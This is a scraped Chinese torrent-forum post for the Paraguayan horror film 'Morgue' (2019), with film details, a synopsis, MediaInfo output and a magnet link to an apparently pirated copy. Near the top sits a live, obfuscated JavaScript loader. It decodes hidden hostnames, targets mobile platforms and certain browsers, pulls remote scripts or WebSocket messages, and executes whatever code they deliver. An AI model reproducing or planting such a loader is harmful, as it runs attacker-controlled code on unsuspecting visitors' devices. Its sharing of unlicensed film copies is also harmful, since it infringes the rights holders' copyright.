索命停尸房[中文字幕].Morgue.2019.1080p.BluRay.DTS.x265-10bit 8.55GB

版主小s 25天前 183

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 索命停尸房 / 现尸报(台)
◎片  名 Morgue
◎年  代 2019
◎产  地 巴拉圭
◎类  别 惊悚 / 恐怖
◎语  言 西班牙语 / 瓜拉尼语
◎上映日期 2019-08-22(巴拉圭)
◎IMDb链接 https://www.imdb.com/title/tt10914482/
◎豆瓣评分 4.7/10 (340人评价)
◎豆瓣链接 https://movie.douban.com/subject/35017073/
◎导  演 雨果·卡多佐 Hugo Cardozo (id:1441114)
◎编  剧 雨果·卡多佐 Hugo Cardozo (id:1441114)
◎演  员 雨果·卡多佐 Hugo Cardozo (id:1441114)

◎标  签 恐怖 / 巴拉圭 / 惊悚 / 2019 / 灵异 / 巴拉圭恐怖 / 巴拉圭电影 / 恐怖惊悚悬疑重口血腥

◎简  介
  影片讲述保安迭戈·马丁内斯头天上班,在地区医院停尸房内的一个晚上,经历了人生中最可怕的夜晚。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 32062015997281563172612587246454381476 (0x181EEB6F67BC55FEDC2880E6F4E91BA4)

  4. Complete name                            : [email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 8.55 GiB

  8. Duration                                 : 1 h 20 min

  9. Overall bit rate                         : 15.1 Mb/s

  10. Movie name                               : Morgue 2019 1080p BluRay DTS [email protected]

  11. Encoded date                             : UTC 2021-08-27 22:48:52

  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 20 min

  21. Bit rate                                 : 13.6 Mb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 800 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 24.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.370

  31. Stream size                              : 7.69 GiB (90%)

  32. Title                                    : @HDSky

  33. Writing library                          : x265 - H.265/HEVC codec

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. Format                                   : DTS

  39. Format/Info                              : Digital Theater Systems

  40. Codec ID                                 : A_DTS

  41. Duration                                 : 1 h 20 min

  42. Bit rate mode                            : Constant

  43. Bit rate                                 : 1 509 kb/s

  44. Channel(s)                               : 6 channels

  45. Channel layout                           : C L R Ls Rs LFE

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 93.750 FPS (512 SPF)

  48. Bit depth                                : 24 bits

  49. Compression mode                         : Lossy

  50. Stream size                              : 873 MiB (10%)

  51. Title                                    : Spanish

  52. Language                                 : Spanish

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Text #1

  56. ID                                       : 3

  57. Format                                   : PGS

  58. Muxing mode                              : zlib

  59. Codec ID                                 : S_HDMV/PGS

  60. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration                                 : 1 h 17 min

  62. Bit rate                                 : 7 075 b/s

  63. Count of elements                        : 642

  64. Stream size                              : 3.91 MiB (0%)

  65. Title                                    : CHS

  66. Language                                 : Chinese

  67. Default                                  : Yes

  68. Forced                                   : No


  69. Text #2

  70. ID                                       : 4

  71. Format                                   : PGS

  72. Muxing mode                              : zlib

  73. Codec ID                                 : S_HDMV/PGS

  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration                                 : 1 h 17 min

  76. Bit rate                                 : 7 215 b/s

  77. Count of elements                        : 642

  78. Stream size                              : 3.99 MiB (0%)

  79. Title                                    : CHT

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No


  83. Menu

  84. 00:00:00.000                             : en:Chapter 01

  85. 00:08:34.875                             : en:Chapter 02

  86. 00:13:40.792                             : en:Chapter 03

  87. 00:21:36.125                             : en:Chapter 04

  88. 00:30:57.083                             : en:Chapter 05

  89. 00:42:30.500                             : en:Chapter 06

  90. 00:56:14.875                             : en:Chapter 07

  91. 01:08:39.958                             : en:Chapter 08

  92. 01:16:42.500                             : en:Chapter 09



TAGS 惊悚 恐怖

磁力链:
  • magnet:?xt=urn:btih:242713A7AC983E629D2360D2BCABCB3BCAEFC964
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回